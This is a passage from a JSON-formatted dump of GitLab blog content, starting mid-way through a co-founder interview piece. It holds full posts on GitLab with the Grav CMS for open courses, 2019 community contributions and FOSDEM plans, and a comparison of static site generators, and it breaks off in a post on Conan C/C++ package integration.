While Sid is co-founder and CEO of the company, Dmitriy is a co-founder and engineering fellow. A fellowship offers a path to advancement for engineers that does not involve people management.\n\nThough GitLab was first built as an alternative to GitHub, it has since expanded its technical capabilities ten-fold, explains Sid. In fact, it was Dmitriy that first built the [CI solution](/solutions/continuous-integration/) and continuous testing framework which is a core component to our product today.\n\n“I was like, he can do whatever he wants – he’s a co-founder and so far his hunches pay off. At a certain point someone contributed to that and then they joined the company and said, 'Let’s integrate the two products.' First Dmitriy told him he was wrong, and then together they came to me and I told them they were wrong, and we ended up doing it and it was the best thing that ever happened to GitLab.”\n\n“How would you describe your relationship with Dmitriy?” asks Banu.\n\nThere are three dimensions to the partnership between Sid and Dmitriy. They are co-founders, there is a hierarchical relationship with Sid as CEO, and of course, a friendship.\n\n“I think it’s frequently better to fall in love with each other’s work and then build a relationship based on that, rather than fall in love with the person and then try to build a business,” says Sid. 
“Friendships based on business tend to last longer than businesses based on friendships.”\n\nWatch the full conversation between Sid and Banu here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/gpQKtSKMzkI?start=6\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nPhoto by [Pavan Trikutam](https://unsplash.com/@ptrikutam) on [Unsplash](https://unsplash.com/photos/71CjSSB83Wo)\n{: .note}\n",[803,9,779],{"slug":1317,"featured":6,"template":689},"cofounder-relations","content:en-us:blog:cofounder-relations.yml","Cofounder Relations","en-us/blog/cofounder-relations.yml","en-us/blog/cofounder-relations",{"_path":1323,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1324,"content":1330,"config":1337,"_id":1339,"_type":14,"title":1340,"_source":16,"_file":1341,"_stem":1342,"_extension":19},"/en-us/blog/collaborative-course-environment-gitlab-grav",{"title":1325,"description":1326,"ogTitle":1325,"ogDescription":1326,"noIndex":6,"ogImage":1327,"ogUrl":1328,"ogSiteName":673,"ogType":674,"canonicalUrls":1328,"schema":1329},"Creating open course environments with GitLab and Grav CMS","Guest author Paul Hibbitts shares how he combines GitLab with the flat-file CMS Grav to provide an open, collaborative and flexible environment that partners with his institution's LMS.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678561/Blog/Hero%20Images/open-course-environment.jpg","https://about.gitlab.com/blog/collaborative-course-environment-gitlab-grav","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Enabling an open and collaborative course environment with GitLab and the Grav CMS\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Paul Hibbitts\"}],\n        \"datePublished\": \"2017-10-12\",\n      
}",{"title":1331,"description":1326,"authors":1332,"heroImage":1327,"date":1334,"body":1335,"category":10,"tags":1336},"Enabling an open and collaborative course environment with GitLab and the Grav CMS",[1333],"Paul Hibbitts","2017-10-12","\n\nTech-savvy educators! Do you want to:\n\n- Share your course materials more openly?\n- Support collaborative editing by students and fellow educators?\n- Deliver a better multi-device experience of your course materials?\n- Be able to update your online course materials in as little as 30 seconds?\n- And, in general, move beyond the constraints of your current Learning Management System?\n\n\u003C!-- more -->\n\nIf this sounds like you, then the combination of an institutionally hosted instance of [GitLab]() and a modern flat-file (no database) Content Management System such as [Grav](https://getgrav.org/) might be your answer!\n\nAs an educator and software interaction designer, I am always striving to deliver a better experience for my students, both in person and online. In the past several years this has led me to ‘flipping’ the Learning Management System, where I use an alternative platform instead of the LMS as the primary online environment. Many instructors (including myself) have taken this approach in the past using a traditional platform such as WordPress, but I found significant new benefits from partnering the LMS with a more modern platform that was built to take full advantage of the open and collaborative ecosystem (i.e. Git, GitLab, GitHub, etc.) we now have.\n\nWith the above approach, direct links are provided to any appropriate LMS elements and sensitive student data remains in the LMS. Common elements across multiple courses, like calendars, assignments, discussion forums, and grades are still stored in the LMS for single-point access by students. 
While perhaps not suited for university-wide adoption, this is a very viable and productive approach for individual instructors and their students while we wait for more open and adaptable institutional-level tools to become available.\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course1.png\" alt=\"Open and Collaborative Flipped LMS Approach Using GitLab and the Grav CMS\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>Open and Collaborative ‘Flipped’ LMS Approach Using GitLab and the Grav CMS\u003C/small>*\n\nFortunately, my university ([Simon Fraser University](http://www.sfu.ca/), or SFU, in Burnaby, BC, Canada) also provides an institutionally hosted instance of GitLab which not only gives me an ideal workspace for my online course materials, but also supports single sign-on so my students can easily contribute to these materials as well. By combining GitLab with the modern flat-file CMS Grav, my institution's LMS and a small collection of other open source web apps, I’ve been able to reach more of my desired teaching goals (such as providing an anytime, anywhere performance support tool with real-time chat) for my own courses than by using the LMS as the primary online space. In addition, I’ve made the resulting software open source to also help other instructors reach their own goals – more about this project at the end of this article!\n\n## Why open source software?\n\nThe advantages of using open source software in the field of education are well documented elsewhere (see [Open Source Software in Education](http://er.educause.edu/articles/2008/5/open-source-software-in-education)), but from my own viewpoint, the things I value most are: having more control over the software I use, the online communities often found with open software projects, public communication with the team developing the software, and the wide range of ways I can contribute to projects. 
I’ve also been keenly following several other open source, institutional-level learning ecosystem efforts, such as [ELMSLN](https://www.elmsln.org/) (a platform for building and sustaining innovation in course technologies) and [TSUGI](https://www.tsugi.org/) (a framework for building learning tools).\n\n## Why GitLab?\n\nGitLab meets several key criteria for its use in a learning ecosystem. First, it is open source software itself and secondly, it is possible to install an instance of GitLab on your own server. For universities and colleges this enhances the benefits of being open source in the first place as single sign-on and the storage of sensitive student data remains in the sole control of the institution.\n\nUsing GitLab in combination with the [GitHub Desktop application](https://desktop.github.com/) I can also very quickly update my online course sites from my desktop, while at the same time being able to then edit course site materials with any code editor I like. Most importantly, students feel like active course participants when they see they are welcome to suggest changes to the course site, or even just to make corrections to course materials. Everything is of course version controlled, which means as a repository administrator I can easily see each and every change before approving them. For changes not immediately approved I can then start a discussion via GitLab with the author of the proposed change to work out any needed further changes, etc. GitLab brings an industrial-strength software and document collaboration tool into the reach of my fellow university colleagues and students.\n\n## Why Grav CMS?\n\nWhile looking for an open source platform to support a learning ecosystem I evaluated multiple options, including self-hosting (for full administrative control) WordPress, Concrete5, Moodle and others. I then came across a number of apps under the category of ‘flat-file CMS,’ meaning that content was stored in files instead of a database. 
I could see that content as files would be a perfect partner for using a web-based Git service (such as GitLab, [GitHub](https://www.github.com/), [GitBook](https://www.gitbook.com/), etc.) to share and collaboratively edit content. With such a partnership, CMS content can be automatically backed up in a straightforward manner, while also tracking all revisions along the way. Digging deeper, I discovered the open source flat-file CMS Grav (by the team behind [RocketTheme](http://www.rockettheme.com/)) used Markdown – the native format for Web-based Git services such as GitLab – for content. Markdown is also an excellent system-independent format to support the ‘5Rs’ of Open Education Resources (Retain, Reuse, Revise, Remix, and Redistribute).\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course2.png\" alt=\"Editing Markdown content in the Grav CMS Admin Panel\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>Editing Markdown content in the Grav CMS Admin Panel\u003C/small>*\n\nGrav uses many existing modern standards and open source components, such as the very user-friendly [Twig language](https://twig.symfony.com/) (courtesy of Symfony) instead of pure PHP for theme templating. Grav also supports modular and custom content types, and was designed from the ground-up to be both fast and extensible. In addition, with the creation of the open source Git Sync plugin (by [Trilby Media](https://trilby.media/)) it is now easier than ever to do two-way syncing of Grav content between a production server, Git repository and an optional local development instance. 
It is even  possible to sync theme files, which determine the actual functionality and presentation of a site, so  educators (or perhaps their tech-savvy students) can directly help other educators needing assistance in additional customization of their Grav sites.\n\nIt should be noted that Grav is not a static site generator, but rather a file-based CMS which supports not only dynamic content but also an online Admin Panel.\n\n## CMPT-363 Open Course Hub\n\nFor my SFU course CMPT-363 User Interface Design this Fall, I will not only be using GitLab and Grav (hosted on the educationally focused [Reclaim Hosting](https://reclaimhosting.com/)), but also a number of other web apps (also mostly open source) to provide a learning ecosystem to my students. Since Grav itself is open and extensible, I can easily add in Javascript elements for a Livechat (which my students have told me they love) thanks to [Rocket.Chat](https://rocket.chat/), responsive Markdown-based slide embeds thanks to the commercial [Swipe.to](https://www.swipe.to/home) web app, and links to an anonymous course feedback form thanks to [Sandstorm.IO](https://sandstorm.io/) and [Quick Survey](https://github.com/simonv3/quick-survey). To address both various other teaching goals (the LMS actually does some things quite reasonably) and student data privacy concerns, I still use the institutional LMS [Canvas](https://www.canvaslms.com/) by Instructure to support a wide range of course elements such as quizzes, assignment submissions, discussion forums, and gradebook. 
You can see this multi-device friendly Course Hub in action at [paulhibbitts.net/cmpt-363-173/](http://paulhibbitts.net/cmpt-363-173/).\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course3.png\" alt=\"CMPT-363 Open Course Hub Learning Ecosystem\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>CMPT-363 Open Course Hub Learning Ecosystem\u003C/small>*\n\n## The Open Course Hub Project\n\nBased on the [very positive student feedback](https://storify.com/paulhibbitts/flipped-lms) and my own experiences with the 2015 CMPT-363 Course Hub, I decided to release an open source version of a pre-packaged Course Hub with Git Sync the following year (called a Skeleton in Grav-speak, which is a ready-to-run package that includes Grav and all needed theme and example content files). While this package can be installed in [less than a minute](https://www.youtube.com/watch?v=8yyE-LaAa8Y) and fully configured in [under five minutes](https://www.youtube.com/watch?v=jnBig4aGfFg) it is intended for fellow tech-savvy educators to use and further customize as they see fit.\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course4.png\" alt=\"CMPT-363 Open Course Hub Web Page\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>CMPT-363 Open Course Hub Web Page\u003C/small>*\n\nWhat are the exact skills currently expected? In general, you should be comfortable with accessing files on a website server, understand folder hierarchies, be familiar with Markdown (here is a [10-minute Markdown tutorial](https://designedbywaldo.com/en/tools/markdown-tutorial)), and have a working knowledge of using GitLab or GitHub. 
Being able to use [GitHub Desktop](https://desktop.github.com/) and a desktop code editor like [Atom.io](https://atom.io/) or [Adobe Brackets](http://brackets.io/) will also bring the ability to store a copy of your Grav site content on your local desktop and then selectively edit and push changes back to the Git repository for deployment to your live Grav Course Hub site. Step-by-step install and configuration instructions for the Grav Course Hub are available at [learn.hibbittsdesign.org/coursehub](http://learn.hibbittsdesign.org/coursehub).\n\nThis is also my way to give back to the open source community in general, which has been so helpful in the development of my own original CMPT-363 Course Hub. Using Grav and the Git Sync plugin I’ve released several additional Open Education Resources (OER) projects, including the Open Publishing Space, and all of these are available at [learn.hibbittsdesign.org](http://learn.hibbittsdesign.org/).\n\nQuestions or comments about using GitLab as an open and collaborative backbone to your learning ecosystem? Please feel free to contact me via email ([paul@hibbittsdesign.org](mailto:paul@hibbittsdesign.org)) or Twitter [@hibbittsdesign](https://twitter.com/hibbittsdesign). 
You can also read more about my learning ecosystem explorations at [hibbittsdesign.org/blog](http://www.hibbittsdesign.org/blog/).\n\n*Special thanks to the folks at GitLab for the kind offer to provide this guest blog post, and everyone from the Grav community and my Twitter network who provided helpful feedback and comments on the draft versions of this post!*\n\n### About the guest author\n\nPaul Hibbitts has been an interaction design practitioner and educator for over 20 years, and has recently ventured into the world of open source software development thanks to the amazing Grav CMS.\n\n\n[Cover image](https://unsplash.com/photos/Y94yKEyNjVw) by [chuttersnap](https://unsplash.com/@chuttersnap) on unsplash\n{: .note}\n",[9,779],{"slug":1338,"featured":6,"template":689},"collaborative-course-environment-gitlab-grav","content:en-us:blog:collaborative-course-environment-gitlab-grav.yml","Collaborative Course Environment Gitlab Grav","en-us/blog/collaborative-course-environment-gitlab-grav.yml","en-us/blog/collaborative-course-environment-gitlab-grav",{"_path":1344,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1345,"content":1351,"config":1356,"_id":1358,"_type":14,"title":1359,"_source":16,"_file":1360,"_stem":1361,"_extension":19},"/en-us/blog/community-update-for-2019",{"title":1346,"description":1347,"ogTitle":1346,"ogDescription":1347,"noIndex":6,"ogImage":1348,"ogUrl":1349,"ogSiteName":673,"ogType":674,"canonicalUrls":1349,"schema":1350},"Celebrating wider community contributions in 2019 and returning to FOSDEM","Here's what the wider community accomplished in 2019 and where to find GitLab at FOSDEM'20.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663430/Blog/Hero%20Images/2018-09-13-gitlab-hackathon-cover.jpg","https://about.gitlab.com/blog/community-update-for-2019","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating wider community 
contributions in 2019 and returning to FOSDEM\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-01-24\",\n      }",{"title":1346,"description":1347,"authors":1352,"heroImage":1348,"date":1353,"body":1354,"category":951,"tags":1355},[704],"2020-01-24","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nFirst of all, I would like to wish everyone in the GitLab Community a Happy New Year! There's been an impressive growth in the wider GitLab community in 2019 and I wanted to share and celebrate what we all accomplished. \n\nThe first chart below shows merged MRs from the wider community beginning with the 11.0 release. We obviously have a nice trendline, but we also had a record number of merged MRs for the 12.6 release (nearly 250!) and this was a great way to close out 2019! \n\n![Wider community contributions per release](https://about.gitlab.com/images/blogimages/Wider_community_contributions_per_release-Dec2019.png){: .medium.center}\n\nI also want to show some numbers on the wider community growth over the past 3 years. As you will see in the chart below, the number of  contributors almost doubled between 2018 and 2019 as we had almost 900 contributors with merged MRs last year. In terms of the number of merged MRs, we had 2400+ MRs in 2019 which is more than 30% increase from the previous year. I really need to congratulate and thank everyone in the wider community for your contributions as these numbers clearly show that GitLab is a thriving open source community. Beyond MRs or code, we appreciate your insight and perspective from your contributions. \n\n![Community contributions in 2018 and 2019](https://about.gitlab.com/images/blogimages/2019_Wider_Community_Contributors_and_Merge_Requests.png){: .medium.center}\n\nI also updated the [top contributors page](https://about.gitlab.com/community/top-annual-contributors/) with the final numbers from 2019. 
The number of regular contributors with 5 or more merged MRs during the year also saw a significant increase from 2018 (35) to 2019 (68). The growth in regular contributors is something we tried to focus on last year, and I'm impressed with the result. Congratulations to everyone who made the list, and your GitLab souvenir will be coming to you soon.\n\n\n### Let's meet at FOSDEM\n\nNow I want to switch gears to what's happening at [FOSDEM](https://fosdem.org/2020/) on February 1st and 2nd. Last year, GitLab had a stand at FOSDEM for the first time and we were overwhelemed with the amount of people who came to talk to us. I'm excited to announce that we will be back with a stand at FOSDEM and look forward to meeting with community members. Our stand will be at Building K/Level 1 and [this page](https://fosdem.org/2020/stands/) will help you find where the GitLab stand is. \n\nWe will also have a meetup session on Sunday as a part of a Birds of a Feather (BOF) track on Sunday (February 2nd) morning between 10:00 - 11:00 in room J.1.106. You can find details on the meetup at [this FOSDEM page](https://fosdem.org/2020/schedule/event/bof_gitlab/).  \n\nIn addition, a couple of GitLab team members are giving talks in devrooms. [Alessio Caiazza](https://gitlab.com/nolith) will discuss [building a smart reverse proxy in Go](https://fosdem.org/2020/schedule/event/speedupmonolith/) and I will have the opportunity to discuss [why community matters in corporate open source projects](https://fosdem.org/2020/schedule/event/corpcommunitythrive/).  \n\nFinally, we are working on organizing a Happy Hour on Saturday (February 1st) evening, so stay tuned for more news on this! 
I hope to see many of you at FOSDEM, and I'll try to make frequent announcements/posts on Twitter during the conference.\n",[267,779,9],{"slug":1357,"featured":6,"template":689},"community-update-for-2019","content:en-us:blog:community-update-for-2019.yml","Community Update For 2019","en-us/blog/community-update-for-2019.yml","en-us/blog/community-update-for-2019",{"_path":1363,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1364,"content":1370,"config":1377,"_id":1379,"_type":14,"title":1380,"_source":16,"_file":1381,"_stem":1382,"_extension":19},"/en-us/blog/comparing-static-site-generators",{"title":1365,"description":1366,"ogTitle":1365,"ogDescription":1366,"noIndex":6,"ogImage":1367,"ogUrl":1368,"ogSiteName":673,"ogType":674,"canonicalUrls":1368,"schema":1369},"How to choose the right static site generator","Here's an in-depth look at 6 static site generators that deploy to GitLab Pages.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682290/Blog/Hero%20Images/kelly-sikkema-gchfxsdcmje-unsplash-resized.jpg","https://about.gitlab.com/blog/comparing-static-site-generators","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to choose the right static site generator\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatima Sarah Khalid\"}],\n        \"datePublished\": \"2022-04-18\",\n      }",{"title":1365,"description":1366,"authors":1371,"heroImage":1367,"date":1373,"body":1374,"category":801,"tags":1375},[1372],"Fatima Sarah Khalid","2022-04-18","\n\nMost websites today fall into two categories - dynamic sites and static sites:\n\n## Dynamic sites\n\nDynamic sites are interactive, and the user experience can be tailored to the visitor. These are the ones that might remember who you are across visits or deliver content that's most applicable to the region you're visiting from. 
They rely on a content management system (CMS) or database for rendering and can continue to grow in complexity as the organization's needs grow. \n\n## Static sites\n\nStatic sites, however, generally display the same content to all users. They use server-side rendering to serve HTML, CSS, and Javascript files. While CMS backends have made dynamic sites easier to launch and maintain, static sites continue to grow in popularity.\n\n## What is a static site generator?\n\nA static site generator (SSG) is a software tool that generates a static website by processing plain text files that contain the websites content and markup. The resulting website consists of a set of HTML, CSS, and JavaScript files, and other assets, that can be served by a web server to visitors.\n\nTo use a static site generator, you typically write your website's' content in a markup language like Markdown, and use a templating language to define the website's layout and structure. You then run the static site generator to generate the final set of HTML, CSS, and JavaScript files, which can be deployed to a web server or content delivery network (CDN) for visitors to access.\n\n## Benefits of using a static site generator\n\nStatic sites' advantages include speed, security, and SEO. They're also easy to maintain and highly scalable. Because the static site generators store an already-compiled page on a CDN, they load a lot faster.\n\nAs static site generators are comprised solely of static files, no database is required, resulting in many additional benefits:\n\n* There is no need to spend valuable time querying the database or running any resource-intensive server-side scripts.\n\n* There are no extraneous libraries, no databases, or other features that a dynamic generator is built with. All you have are static files. Therefore, it’s very simple to work with and migrate as needed.\n\n* There’s no database for would-be hackers to attack. 
\n\n* Since there is no need for scripts to run on a file-based generator, scaling is very easy without overwhelming your server.\n\nAll static site generators can be exciting and fun, but some require time and effort on configurations, detailed templating, or management tweaks. My team and I joke that I am one of the top blog-less SSG experts, so in this blog post, I’ll walk you through a toolkit for evaluating your project and then share some SSGs that deploy to GitLab Pages. \n\nHere are the SSGs I'll review in this post:\n\n- [**Hugo**](https://gohugo.io/) is written in Go with support for multi-language sites and complex content strategy.\n- [**Zola**](https://www.getzola.org) is written in Rust with a single binary, no dependencies, and flexible features like Sass compilation.\n- [**Jekyll**](https://jekyllrb.com/) is written in Ruby, built for blogging, and has a large collection of plugins and themes.\n- [**Hexo**](https://hexo.io/) is Node.js based with support for multiple templating engines, integrations with NPM packages, and one command deployment.\n- [**GatsbyJS**](https://www.gatsbyjs.com/) is React-based, works with any CMS, API, or database, and can be used for building headless experiences.\n- [**Astro**](https://gitlab.com/pages/astro) is Javascript-based, supports multiple frameworks, and is known for on-demand rendering via partial hydration.\n\n##  An Evaluation Toolkit\n\nWith so many static site generators available, selecting one for your project can be overwhelming. When evaluating which SSG is right for you, here are a few things to consider about your project, use case, and the type of work you're looking to put into the site. \n\n**Identify the use case**\n\nIt’s important to understand your site's needs, purpose, and content. Are you building a personal blog, a landing page for a product, or documentation for a tech project? Consider whether you need a streamlined editor experience, content, and interactions with your user. 
The better you can identify the experience you'd like your visitors to have, the easier it will be to pick the feature set that can best support it. \n\n**Specify languages and frameworks**\n\nThere are so many static site generators out there that you can find one in nearly every language and framework. Consider whether you want to learn a new language or use something you're familiar with. Depending on how much time you’d like to invest in setting up, you should also review the installation details and see if you’re familiar with the templating language, dependencies, and theming layer. \n\n**Review the ecosystem**\n\nMany static site generators will have starter repositories or sample sites where you can play around with functionality and components before diving into your project. When reviewing the ecosystem, think about the limitations of the templating engine and whether you’ll need dynamic or Javascript components, and how you’ll include them. Some generators will have out-of-the-box or community-contributed plugins and extensions. \n\n**Check out the community**\n\nThere are often Discord or forum communities where you can get support, share ideas, review cases studies, and see what other people are building. Some of the most popular generators might even have conferences or workshops for getting started on more complex topics. \n\n**Identify the specialty** \n\nFrom microblogging to academic portfolios and small business sites, static site generators cover various use cases for different people. Each SSG has its own thing, whether it’s the framework it uses, a unique feature in its templating language, or the size of the installation binary.\n\n## The Single Binary Approach \n\nSome static site generators install a single binary and don't require complex dependency management. The single binary approach gets things set up quickly and easily. 
It is also easier for non-technical or academic users since you can pass the executable around for installation and use a markup language like Markdown to write content. \n\n[**Hugo**](https://gohugo.io/) is written in Go, a statically compiled language, with support for multiple platforms. The Hugo binary can be downloaded and run from anywhere and is simple to install, with no runtime dependencies or installation process. Upgrades involve downloading a new binary, and you're all set. Hugo supports unlimited content types, taxonomies, dynamic content driven from an API, multi-lingual sites, and markdown. It also ships with premade templates making it easy to get started with menus and site maps. \n\nOne of the advantages of using Hugo is that it doesn't depend on client-side JS. It also has a thriving community with many prebuilt themes and starter repositories. There is an [existing sample site in Hugo that deploys to GitLab pages](https://gitlab.com/pages/hugo). If you're migrating to Hugo from another SSG, you can use the [hugo import](https://gohugo.io/commands/hugo_import/) command or one of the [community-developed migration tools](https://gohugo.io/tools/migrations/). There's a [Hugo site example](https://gitlab.com/pages/hugo) on GitLab pages to help you get started.\n\n[**Zola**](https://www.getzola.org) is a strongly opinionated SSG written in Rust that uses the Tera template engine. It's available as [a prebuilt binary](https://github.com/getzola/zola/releases), is super-fast to set up, and comes with some essential features like syntax highlighting, taxonomies, table of contents, Sass compilation, and hot reloading. The Tera templating engine supports build-in short-codes to inject more complex HTML or for repetitive data-driven sections. Configuration for Zola sites is managed in TOML.\n\nOne of the limitations of Zola might be the lack of a built-in scripting language. Unlike other SSGs, there isn't an ecosystem of plugins you can add to your site. 
Many in the community appreciate this lack of modularity because Zola’s specialty is content-driven sites. [One of the most popular posts on their Discourse forum is a proposal for plugins](https://zola.discourse.group/t/proposal-plugin/975) which discusses ways to include dynamic loading for plugins without affecting the single binary distribution. \n\nZola is commonly used for content-driven websites. One of its notable features is how content is structured using a tree with sections and pages.  There is no example site on GitLab pages, but the Zola documentation includes a [guide on how to deploy to GitLab pages](https://www.getzola.org/documentation/deployment/gitlab-pages/). \n\n## The Standard Approach\n\nWhen it comes to generators and frameworks, you might hear, \"Boring is better.\" Sometimes the preferred SSG is feature complete, well documented, and has a community of examples and plugins to support it - even if it's not actively growing anymore. \n\n[**Jekyll**](https://jekyllrb.com/) is a static site generator written in Ruby and released in 2008. It paved the way for static sites by replacing the need for a database and inspiring developers to start creating blogs and documentation pages quickly and easily. It uses the Liquid templating language, has a vast plugin ecosystem, and is known to be beginner-friendly since it’s just HTML (or Markdown, if you prefer). While it doesn’t provide many features out of the box, Jekyll supports Ruby plugins for any functionality you might need. There are over [200 plugins](https://github.com/topics/jekyll-plugin), themes, and resources available to use.\n\nOne of the challenges when working with Jekyll can be the requirement of having a whole Ruby development environment to build your site. This can be tricky for developers unfamiliar with Ruby or when making updates. 
Another thing to consider is the build pipeline - it supports Sass compilation out of the box, but the community recommends using webpack to build assets instead. If you're migrating to Jekyll from another framework or CMS, there are [importers](https://import.jekyllrb.com/docs/home/) that can help automate part of the process. There is a [Jekyll site example that deploys to GitLab pages](https://gitlab.com/pages/jekyll).\n\n[**Hexo**](https://hexo.io/) is a NodeJS static site generator that offers itself as a blogging framework. It has built-in support for Markdown, front matter, and tag plugins. It specializes in creating markup-driven blogs. Hexo provides the Nunjucks template engine by default, but you can easily install additional plugins to support alternative templating engines. Like Jekyll, Hexo also [supports migrations](https://hexo.io/docs/migration#content-inner) from several popular frameworks, including WordPress. \n\nA notable feature of Hexo is tag plugins. Tag plugins are snippets of code you can add to your Markdown files without having to write complex or messy HTML to render specific content. Hexo supports several tag plugins, including block quotes, Twitter and Youtube embeds, and code blocks. There’s an [example site for Hexo that deploys to GitLab pages](https://gitlab.com/pages/hexo) and also a [guide in the Hexo documentation](https://hexo.io/docs/gitlab-pages). \n\n## SSGs and beyond\n\nFor those who love flexibility and modularity, there are some SSGs that allow you do everything from full content moderation support and dynamic API-driven content to state management and partial rendering. \n\n[**GatsbyJS**](https://www.gatsbyjs.com/) is an open-source React-based static site generator optimized for speed and has an extensive plugin library. GatsbyJS supports routing, and handling images, accessibility, and hot reloading out of the box. 
To improve performance, it loads only the critical elements of the page and prefetches assets for other pages to load them as quickly as possible. It also uses webpack to bundle all of your assets. \n\nGatsbyJS believes in a “content mesh” where third-party platforms provide specialized functionality to the base architecture. It allows you to seamlessly pull data from multiple sources, making it popular for Headless approaches with a CMS backend like Drupal, WordPress, or Contentful. You use GraphQL to query the APIs and manage data throughout your site. The GatsbyJS community has contributed over 2000 plugins, including starter repositories and templates that you can use to get started. There’s an [example GatsbyJS site that deploys to GitLab pages](https://gitlab.com/pages/gatsby). \n\n[**Astro**](https://gitlab.com/pages/astro) is a Bring Your Own Framework (BYOF) static site generator with no package dependencies. You can build your site with any JavaScript framework or web components, and Astro will render it into static HTML and CSS. This flexibility has made it popular since it’s future-proof for migrations. Astro ships with automatic sitemaps, RSS feeds, and pagination. It uses Snowpack to compile Javascript, which supports hot module replacement, ES6 modules, and dynamic imports without extra configuration. The project is still a [Beta release with the 1.0 coming in June 2022](https://twitter.com/astrodotbuild/status/1512505549354639363?s=20&t=zXDUGuYmbiOp08FTETXw5A). \n\nA notable feature of Astro is partial hydration. If you decide that parts of your site need interactivity, you can “hydrate” just those components when they become visible on the page. This way, your pages will load super fast by default and have [“islands of interactivity”](https://docs.astro.build/en/core-concepts/partial-hydration/#island-architecture). There are several themes, plugins, components, and showcase projects available. 
Astro has [an online playground](https://astro.new/) where you can try out features and integrations in your browser. There’s also [an Astro example site on GitLab pages](https://gitlab.com/pages/astro). \n\n## Creating your own SSG\n\nSometimes, the best part of building a static site is creating a custom generator based on a specific programming language, architecture, and feature set. You might find that the process of creating a static site generator is more exciting than actually writing blogs for your site. Consider several preferences, from document structure to a templating language, theming support, custom plugins, and the build pipeline. You’ll have the opportunity to customize the features to your liking. And there are many [static site generators that deploy to GitLab pages](https://gitlab.com/pages) to provide inspiration! \n\n\nCover image by [Kelly Sikkema](https://unsplash.com/photos/gcHFXsdcmJE) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1376,267,9],"frontend",{"slug":1378,"featured":6,"template":689},"comparing-static-site-generators","content:en-us:blog:comparing-static-site-generators.yml","Comparing Static Site Generators","en-us/blog/comparing-static-site-generators.yml","en-us/blog/comparing-static-site-generators",{"_path":1384,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1385,"content":1390,"config":1396,"_id":1398,"_type":14,"title":1399,"_source":16,"_file":1400,"_stem":1401,"_extension":19},"/en-us/blog/conan-c-cpp-package-management-integration",{"title":1386,"description":1387,"ogTitle":1386,"ogDescription":1387,"noIndex":6,"ogImage":1211,"ogUrl":1388,"ogSiteName":673,"ogType":674,"canonicalUrls":1388,"schema":1389},"Modern C and C++: How Conan integration works in GitLab","Conan is a leading C and C++ package manager and it is now available in GitLab. 
Store and share packages easily with your teams or publicly.","https://about.gitlab.com/blog/conan-c-cpp-package-management-integration","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Modern C and C++: How Conan integration works in GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jordi Mon\"}],\n        \"datePublished\": \"2020-03-31\",\n      }",{"title":1386,"description":1387,"authors":1391,"heroImage":1211,"date":1393,"body":1394,"category":801,"tags":1395},[1392],"Jordi Mon","2020-03-31","\n\nAs a single application for all the software development and delivery lifecycle, GitLab strives to support all the different software workflows and pipelines. Regardless of how complex this cycle might be (I’m looking at you C++), what we want to do is soothe these pains for C and C++ GitLab users. Following up on this metaphor, as doctors we would like to listen to the patient first: It all started with our community explaining their symptoms and chipping in the first ideas [here](https://gitlab.com/gitlab-org/gitlab-foss/issues/54747). This became even more relevant for GitLab when clients in C++ reliant industries like finance, robotics or embedded software added their interest to supporting package management for C++.\n\n### Conan is now available on GitLab\n\nThe C and C++ ecosystems have a ton of legacy tooling. It is what it is: they’ve been around for a long time and the community is, in a way, very DIY-driven. For example, many C++ libraries are advertised as “Zero deps inside.” This badge is intended as a sign of quality, and is even a bit of a status symbol for the devs and maintainers. That's fine for C/C++ developer but what about the users of such libs? Regardless of the actual quality of the lib’s code, if you wanted to use any of them, you’d better have a local, updated copy of them in a Git submodule. 
This is especially relevant for head-only monsters like Boost, the most popular set of libs in C++. In other words, in order to make use of them (that’s why they were created in the first place, I guess), you basically have to download the [source code](/solutions/source-code-management/), build it yourself (good luck with that), compile it and include the resulting binary in your project. This process can be time consuming and, if build processes are not well documented or supported, it can be exasperating. All of this can become a real nightmare if transitive dependencies are present, or if different [version control systems](/topics/version-control/) have been used. It's also tricky when deciding upon static or dynamic binaries, static or dynamic linking, single or multi-threaded, 32-bit or 64-bit…\n\n### How to build C and C++ packages in GitLab the Conan way\n\nThe GitLab Conan integration allows Conan users to set GitLab as the remote registry for their packages. Users will be able to set the remote and upload and install packages from GitLab’s registry. Think of it this way: you still use the same CLI to work with your Conan packages, but GitLab is on the receiving end. In doing so, GitLab creates the unique opportunity to have the code and package generated from the code living in the same place, freeing users from having to manage multiple services to store packages and code separately and still have them working together. 
